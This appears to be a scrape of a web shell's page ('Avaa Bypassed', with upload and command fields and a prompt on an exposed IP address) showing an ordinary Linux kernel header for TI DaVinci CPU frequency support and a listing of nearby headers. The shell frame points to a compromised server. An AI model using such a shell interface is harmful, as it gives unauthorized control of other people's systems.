404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.16.139.76: ~ $
/*
 * TI DaVinci CPUFreq platform support.
 *
 * Copyright (C) 2009 Texas Instruments, Inc. http://www.ti.com/
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License as
 * published by the Free Software Foundation version 2.
 *
 * This program is distributed "as is" WITHOUT ANY WARRANTY of any
 * kind, whether express or implied; without even the implied warranty
 * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 */
#ifndef _MACH_DAVINCI_CPUFREQ_H
#define _MACH_DAVINCI_CPUFREQ_H

#include <linux/cpufreq.h>

struct davinci_cpufreq_config {
	struct cpufreq_frequency_table *freq_table;
	int (*set_voltage) (unsigned int index);
	int (*init) (void);
};

#endif

Filemanager

Name Type Size Permission Actions
clock.h File 658 B 0644
common.h File 2.67 KB 0644
cpufreq.h File 806 B 0644
cputype.h File 2.27 KB 0644
da8xx.h File 5.92 KB 0644
entry-macro.S File 1.03 KB 0644
hardware.h File 1022 B 0644
irqs.h File 12.52 KB 0644
mux.h File 16.25 KB 0644
pm.h File 2.03 KB 0644
serial.h File 1.01 KB 0644
time.h File 950 B 0644
uncompress.h File 2.22 KB 0644